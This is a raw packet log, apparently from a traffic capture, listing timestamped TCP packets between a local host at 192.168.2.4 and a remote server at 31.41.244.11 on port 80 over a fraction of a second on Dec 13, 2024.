                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.465826035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.465939999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.466048002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.466396093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.466535091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.466582060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.467472076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.467547894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.467588902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.468517065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.468563080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.468677998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.469698906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.469715118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.469746113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.469772100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.470721006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.470853090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.470896959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.471812963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.471916914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.471959114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.472951889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.472999096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.473037004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.474034071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.474072933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.474080086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.474107027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.475121021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.475227118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.475281000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.476147890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.476176023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.476242065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.477248907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.477341890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.477392912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.478315115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.478358030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.478432894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.478781939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.479372978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.479414940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.479444027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.479481936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.480467081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.480508089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.480520964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.480559111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.481611967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.481650114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.481674910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.481710911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.482698917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.482738972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.482753992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.482789040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.483761072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.483942032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.483984947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.484867096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.484954119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.484997034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.485917091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.485958099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.486002922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.486990929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.487032890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.487076998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.487322092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.488138914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.488153934 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.488193989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.489221096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.489334106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.489377975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.490293980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.490333080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.490377903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.490520954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.491341114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.491384983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.491411924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.491447926 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.492475033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.492518902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.492625952 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.492664099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.493531942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.493571043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.493649960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.493690014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.494611025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.494651079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.494718075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.494756937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.495692968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.495834112 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.495871067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.496783018 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.496885061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.496923923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.497915983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.497932911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.497953892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.497976065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.498963118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.499017954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.499058962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.500062943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.500511885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.500555038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.501118898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.501158953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.501249075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.502270937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.502309084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.502310991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.503323078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.503341913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.503361940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.503376961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.504400015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.504544973 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.505287886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.505558968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.505579948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.505609989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.505626917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.506618023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.506880999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.506928921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.507659912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.507893085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.507937908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.508780956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.508822918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.509366989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.509867907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.509916067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.510499954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.510828972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.510905981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.510932922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.510977030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.512001038 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.512684107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.512732983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.513145924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.513161898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.513183117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.513206959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.514239073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.514306068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.514360905 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.515264988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.515566111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.515621901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.516726971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.516783953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.516818047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.517411947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.517467022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.517697096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.518506050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.518563986 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.519481897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.519601107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.519654989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.519953966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.520008087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.520842075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.520862103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.520915031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.521822929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.521944046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.522007942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.522855043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.526873112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.657951117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.658023119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.658030987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.658231974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.658533096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.658549070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.658584118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.658618927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.659625053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.659684896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.659780025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.659826994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.660634995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.660689116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.660733938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.661766052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.661824942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.661885977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.662785053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.662970066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.663039923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.663085938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.663880110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.663937092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.663969994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.664021969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.665002108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.665056944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.665333033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.665380955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.666134119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.666188955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.666270971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.666315079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.667195082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.667253017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.667304993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.667355061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.668242931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.668306112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.668325901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.668374062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.669337034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.669394016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.669437885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.669534922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.670440912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.670496941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.671021938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.671070099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.671572924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.671915054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.671969891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.672610998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.672796011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.672848940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.673713923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.673782110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.673829079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.674823046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.674885988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.674906015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.674949884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.675889969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.675946951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.676194906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.676256895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.676970005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.677026987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.677028894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.677071095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.678029060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.678102970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.678117990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.678164005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.679126978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.679188013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.679496050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.679549932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.680207014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.680262089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.680854082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.680912971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.681324005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.681368113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.681478024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.681519985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.682420015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.682466030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.682518959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.683466911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.683516026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.683551073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.684575081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.684600115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.684640884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.684746981 CET804976331.41.244.11192.168.2.4
